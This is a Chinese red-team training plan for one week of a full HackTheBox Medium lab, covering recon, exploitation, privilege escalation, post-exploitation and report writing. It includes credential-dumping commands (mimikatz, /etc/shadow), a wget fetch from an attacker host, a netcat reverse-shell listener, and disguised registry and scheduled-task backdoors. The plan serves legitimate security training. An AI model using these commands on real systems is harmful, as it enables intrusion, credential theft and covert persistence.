================================================================================
第26周：综合渗透实战 (综合演练期)
================================================================================

【本周围绕的核心渗透案例阶段】
引用红队队员完整学习手册中的案例：
综合演练阶段——在前五周系统学习了提权(Linux/Windows)、代理隧道、
后渗透、痕迹清除与报告后，本周将在HackTheBox Medium难度的真实靶机
上独立完成完整的渗透流程。目标是检验前五周学习的综合应用能力。

【本周学习目标】
1. 独立完成至少一台HTB Medium难度靶机的完整渗透
2. 综合运用侦察→扫描→漏洞发现→利用→提权→后渗透的全链路技能
3. 在实际操作中识别和补充个人技能短板
4. 培养自主搜索和研究能力（遇到困难时查阅Writeup/文档）
5. 输出符合行业标准的完整渗透测试报告
6. 通过与官方Writeup对比，发现方法论的差距

【本周知识清单】
- HTB平台注册与OpenVPN连接（如未完成）
- Medium难度靶机特点：
  - 通常需要多种技术组合（非单一漏洞即可拿下）
  - 可能需要自定义脚本或修改公开Exploit
  - 提权路径不直接，需要多步信息收集
  - 可能涉及内网或域环境基础
- 综合渗透的标准化流程
- 渗透过程中的时间管理和效率优化
- 如何高效查阅Writeup（避免直接看答案）

【本周工具清单】
- HackTheBox VPN配置
- nmap + nse脚本 — 全面端口和服务扫描
- gobuster / ffuf / dirsearch — 目录和文件枚举
- Burp Suite — Web应用测试
- Metasploit / searchsploit — 漏洞利用
- linpeas.sh / winPEAS — 权限提升枚举
- impacket / CrackMapExec — 后渗透与横向移动
- mimikatz — 凭证提取
- 渗透测试报告模板（第25周制作）

================================================================================
周一：HTB Medium靶机 — 侦察与信息收集
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：Medium难度靶机的方法论准备
    - Medium vs Easy靶机的区别：
      - Easy: 1-2个漏洞，提权路径直接，服务版本明确可搜到
      - Medium: 3-5个漏洞链，提权需多步，可能需修改exploit代码
      - Easy: 端口/服务明显，Medium: 可能有非标准端口、需要自定义脚本
    - 面对未知目标的系统化侦察流程：
      步骤1: 全端口扫描(不要只扫常用端口)
      步骤2: 服务版本深度识别(-sV --version-intensity 9)
      步骤3: NSE脚本针对性扫描(-sC或按服务选脚本)
      步骤4: UDP端口扫描(不要忽略UDP)
      步骤5: Web目录枚举
    - 枚举结果的优先级排列方法
    - 遇到不熟悉的服务/端口时如何进行信息搜索
    - Medium机器通常需要的技能组合提示
  参考文件：回顾前五周笔记，重点复习侦察和枚举部分

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：选定一台HTB Medium靶机，执行全面信息收集

  操作步骤：
    Step 1: 连接HTB并确认连通性
      启动HTB OpenVPN连接
      确认分配IP: ifconfig tun0
      ping HTB靶机IP确认连通
    Step 2: 全端口TCP扫描
      nmap -p- --min-rate=10000 -T4 <target_IP> -oN nmap_allports.txt
      等待扫描完成，记录所有开放端口
    Step 3: 针对开放端口做详细扫描
      nmap -p <开放端口列表> -sV -sC -O <target_IP> -oN nmap_detailed.txt
      等待banner识别和脚本扫描完成
    Step 4: UDP端口扫描
      nmap -sU --top-ports=100 <target_IP> -oN nmap_udp.txt
      注意: UDP扫描速度慢，先用常用端口
    Step 5: Web服务深度枚举（如有Web端口）
      gobuster dir -u http://<target_IP>:端口/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js
      ffuf -u http://<target_IP>:端口/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
      检查robots.txt, sitemap.xml, 源码注释, JS文件
    Step 6: 整理并分析所有发现
      以表格形式整理: 端口 | 服务 | 版本 | 可能存在的漏洞
      建立优先级: 高(可直接利用) > 中(需进一步分析) > 低(暂不处理)
      确定下一步的漏洞发现方向

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：____________________
  - 发现端口/服务：____________________
  - 下一步计划：____________________

================================================================================
周二：HTB Medium靶机 — 漏洞发现与初始利用
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：漏洞发现策略和自定义利用
    - 根据服务版本查找已知漏洞：
      - searchsploit <服务名> <版本号>
      - Google: "服务名 版本号 exploit"
      - Exploit-DB, PacketStorm, GitHub
      - CVE Details / NVD 查看CVE详情
    - 漏洞利用前的评估：
      - exploit是否匹配目标OS/架构
      - exploit代码是否需要修改(IP/PORT/路径)
      - exploit是否需要编译(目标有无gcc/编译器)
      - 是否需要身份认证状态
    - Web应用漏洞发现：
      - 手动测试: SQLi, XSS, LFI/RFI, File Upload, Command Injection
      - Burp Suite拦截分析
      - 敏感信息泄漏: .git, .bak, .swp, 配置文件
      - API端点枚举
    - 当自动化工具无果时的手动挖掘思路

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：利用发现的漏洞获取初始Shell

  操作步骤：
    Step 1: 针对昨日发现的服务版本搜索漏洞
      searchsploit <service_name> → 筛选匹配版本的exploit
      逐个查看exploit代码，评估适用性
    Step 2: 尝试使用公开exploit
      下载匹配的exploit
      阅读代码理解原理（不要盲目运行）
      修改exploit中的IP/PORT/路径等参数
      执行exploit尝试获取Shell
    Step 3: Web应用漏洞测试
      如有Web页面，使用Burp Suite拦截和分析请求
      测试常见注入点: URL参数、POST参数、Cookie、Header
      尝试文件包含、命令注入、文件上传
      查看页面源代码中的隐藏信息
    Step 4: 自定义脚本编写（如需）
      如果公开exploit不匹配，尝试理解漏洞原理后自行编写
      使用python3或bash编写exploit脚本
    Step 5: 获得初始Shell
      确认Shell获取方式: 反弹shell / webshell / SSH凭据
      使用nc或pwntools建立监听: nc -lvnp 4444
      记录获取Shell的方法和步骤
    Step 6: 初始Shell稳定化
      升级Shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
      Windows: 使用nc.exe反弹cmd或powershell
      确认: whoami, id, hostname, uname -a

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：____________________
  - 已获取的权限：____________________
  - 遇到的障碍：____________________
  - 下一步：准备提权

================================================================================
周三：HTB Medium靶机 — 提权与深度利用
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：提权方法论回顾与进阶
    - Linux提权快速checklist（回顾第21周）:
      - 手动: whoami; id; uname -a; sudo -l; find / -perm -4000
      - 自动: linpeas.sh; linux-exploit-suggester
      - 关注: SUID, Sudo, Cron, Capabilities, 内核漏洞
    - Windows提权快速checklist（回顾第22周）:
      - 手动: whoami /all; net user; whoami /priv
      - 自动: winPEASx64.exe; Seatbelt; PowerUp
      - 关注: Token, Service, UAC, 内核漏洞
    - Medium难度提权常见模式：
      - 不是简单的GTFOBins利用
      - 可能需要审计自定义脚本/程序
      - 可能存在密码重用或配置文件泄露
      - 可能需要利用系统组/容器环境
    - 提权受阻时的排查方法：
      - 重新审视所有收集到的信息
      - 检查之前忽略的低优先级项目
      - 检查其他用户目录中的文件

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：在初始Shell基础上完成提权

  操作步骤：
    Step 1: 手动信息收集
      执行全套手动信息收集命令（不依赖自动化工具）
      列出: /home目录结构, 所有用户, 网络连接, 运行进程
    Step 2: 上传自动化信息收集工具
      cd /tmp (或C:\Windows\Tasks)
      wget http://<攻击机IP>/linpeas.sh (或certutil下载)
      执行自动化扫描
    Step 3: 分析自动化工具输出
      重点分析红色/高风险标记项
      记录所有可能的提权路径
      将结果记录为结构化笔记
    Step 4: 尝试每条提权路径
      按成功概率从高到低依次尝试：
        路径1: SUID/Sudo配置错误 → GTFOBins查询 → 利用
        路径2: Kernel Exploit → 搜索/下载/编译/执行
        路径3: Cron/Service Misconfig → 劫持/修改
        路径4: 内部密码泄露 → 配置文件中的密码
      每次失败后记录失败原因
    Step 5: 成功提权
      验证: whoami 显示 root 或 NT AUTHORITY\SYSTEM
      记录提权方法和关键命令
    Step 6: 提取root/administrator flag
      搜索flag文件: find / -name "*flag*" -o -name "*root*" 2>/dev/null
      Windows: dir /s /b C:\Users\Administrator\Desktop\*.txt
      提交flag到HTB平台确认成功

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：____________________
  - 提权路径：____________________
  - User Flag: ____________________
  - Root/Admin Flag: ____________________

================================================================================
周四：HTB Medium靶机 — 后渗透与持久化
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：在真实场景中应用后渗透技能
    - 提权后的信息收集清单：
      - 内网拓扑发现(Linux: arp -a, route; Windows: net view, arp -a)
      - 用户凭据收集(Linux: ~/.bash_history, /etc/shadow; Windows: mimikatz)
      - 敏感文件搜索(*.conf, *.sql, *.kdbx, *.ovpn, SSH私钥)
      - 服务发现(数据库、Web、文件服务器、邮件)
    - 持久化策略选择：
      - 低干扰(优先): SSH密钥、计划任务(Cron/Schtasks)
      - 中干扰: Systemd Service, 注册表Run键
      - 高干扰(谨慎): 修改系统二进制文件
    - 评估是否需要横向移动：
      - 检查是否有其他可达内网
      - 评估额外目标的价值
    - 痕迹清除的适时执行
  参考文件：回顾第24-25周笔记

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：提权后的后渗透操作

  操作步骤：
    Step 1: 内网拓扑发现
      route print (Windows) 或 route -n (Linux)
      arp -a 查看邻近主机
      netstat -ano/tulpn 查看监听和连接
      记录所有发现的内部IP和网络结构
    Step 2: 敏感信息收集
      Linux: find / -name "*.conf" -o -name "*.sql" -o -name "*.ovpn" 2>/dev/null
             find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
             cat /etc/passwd, cat /etc/shadow
             history | grep -i pass
      Windows: 检查C:\Users\各用户\AppData\ (浏览器保存密码)
              reg query HKLM /f password /t REG_SZ /s
              dir /s /b C:\Users\*.txt
    Step 3: 凭证提取
      Linux: 查看可用的.pem/私钥文件
             cat ~/.bash_history | grep -E "(ssh|pass|token)"
      Windows: 使用mimikatz提取LSASS凭证
              sekurlsa::logonpasswords
              token::elevate
              lsadump::sam
    Step 4: 建立持久化
      Linux: echo "SSH公钥" >> /root/.ssh/authorized_keys
             创建Crontab后门或Systemd Service
      Windows: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Windows\Tasks\payload.exe"
               或创建计划任务: schtasks /create /tn "Updater" /tr "C:\Windows\Tasks\nc.exe ..." /sc onstart
    Step 5: 寻找额外目标（如有内网）
      通过代理搭建隧道访问内网（参考第23周）
      对内网目标做快速扫描和服务识别
    Step 6: 整理最终渗透成果
      记录完整渗透路径: 初始访问 → 信息收集 → 提权路径 → flag位置
      记录所有收集到的凭据和敏感信息
      评估: 这台机器最有效的渗透技术是什么

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：____________________
  - 内网发现：____________________
  - 收集到的凭据/敏感信息：____________________

================================================================================
周五：渗透报告输出与自查
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：将实战经验固化为方法论
    - 个人方法论更新：
      - 这次实战中哪些工具组合最有效？
      - 遇到了什么在第21-25周未覆盖的盲区？
      - 哪些假设在实战中被验证/推翻？
    - 渗透报告格式回顾（参考第25周周三内容）
    - 报告自查清单：
      ✓ 执行摘要是否让非技术管理者也能理解风险？
      ✓ 每个漏洞的复现步骤是否完整可重现？
      ✓ CVSS评分是否准确？
      ✓ 修复建议是否具体可操作？
      ✓ 是否包含漏洞影响的业务描述？

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：撰写本周渗透的完整报告

  操作步骤：
    Step 1: 整理渗透全过程笔记
      按时间线回顾本周操作记录
      补充当时忽略的细节
      截图标注关键步骤（打码敏感信息）
    Step 2: 撰写报告 — 执行摘要
      概括目标系统概况、测试方法、关键发现
      列出漏洞统计（数量+风险等级分布）
      给出总体安全风险评级
    Step 3: 撰写报告 — 漏洞详情
      漏洞1: 初始访问漏洞（如Web漏洞）
        标题、CVSS向量和分数、风险等级
        发现过程、利用步骤（含命令/截图）、业务影响
        修复建议（含配置示例）
      漏洞2: 权限提升漏洞
      漏洞3-N: 其他辅助漏洞和配置问题
    Step 4: 撰写报告 — 后渗透发现
      内网拓扑
      敏感信息风险
      推荐的加固措施
    Step 5: 撰写报告 — 修复优先级建议
      按紧急程度排序的修复建议表
      短期(14天) / 中期(30天) / 长期(90天) 修复计划
    Step 6: 自我审查
      使用上述自查清单逐项检查
      修正发现的格式/内容问题
      保存完成的渗透报告

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：____________________
  - 报告完成情况：____________________
  - 自我评分(1-10)：____________________

================================================================================
周六：复盘与Writeup对比 (2h 复盘 + 1h 选做)
================================================================================

📚 复盘内容（2小时）
  1. 阅读HTB官方Writeup或社区Writeup
     - 对比自己的渗透路径和Writeup中的路径
     - 记录Writeup中使用了但自己没想到的技术
     - 对比提权路径的差异（Writeup可能展示多种路径）
  2. 识别个人技能短板
     - 在哪个阶段花费时间最长？
     - 哪个漏洞类型自己不太熟练？
     - 是否需要加强编程能力？
  3. 更新个人渗透checklist
     - 加入这次实战中学到的新检查项
     - 优化枚举顺序和优先级判断规则

💻 选做练习（1小时）
  - 尝试本周靶机的另一种渗透路径（Writeup中的其他方法）
  - 或选择一台HTB Easy机器快速练习（限制2小时内完成）
  - 目标: 巩固本周发现的短板

📝 复盘笔记
  - 本周最成功的操作：____________________
  - 本周最大的教训：____________________
  - 技能短板清单：____________________
  - 下周预习计划：无线安全基础（802.11协议、网卡监听模式）

================================================================================
周日：休息日
================================================================================

【本周资源清单】
理论知识文件：
  - 回顾前五周(第21-25周)的所有理论知识文件：
    /home/a/成长为一个红队/archstrike-privilege-escalation教学/01-Linux权限提升完整指南.txt
    /home/a/成长为一个红队/archstrike-privilege-escalation教学/02-Windows权限提升技术.txt
    /home/a/成长为一个红队/archstrike-privilege-escalation教学/03-提权综合工具链实战.txt
    /home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt
    /home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt
    /home/a/成长为一个红队/archstrike-base教学/07-后渗透与权限维持.txt
    /home/a/成长为一个红队/archstrike-base教学/08-痕迹清除与渗透报告.txt
    /home/a/成长为一个红队/archstrike-forensics教学/01-磁盘取证与反取证.txt

实践教程文件：
  - HTB靶机Writeup（渗透完成后查阅对比）
  - 前五周所有实验笔记

在线练习：
  HackTheBox: 任意Medium难度靶机（根据个人兴趣选择）
    推荐Linux: Passage, Shocker, Cap, Horizontall, Meta
    推荐Windows: Active, Forest, Sauna, Monteverde, Return
    推荐混合: Writer, Forge, Previse

辅助资源：
  - IppSec YouTube频道 (HTB最优视频Writeup)
  - 0xdf黑客博客 (高质量HTB Writeup)
  - HTB官方论坛（指定靶机的讨论区）

【本周完成检查】
[ ] 周一 [ ] 周二 [ ] 周三 [ ] 周四 [ ] 周五
[ ] 周六复习 [ ] 笔记 [ ] 体能 [ ] 渗透报告完成
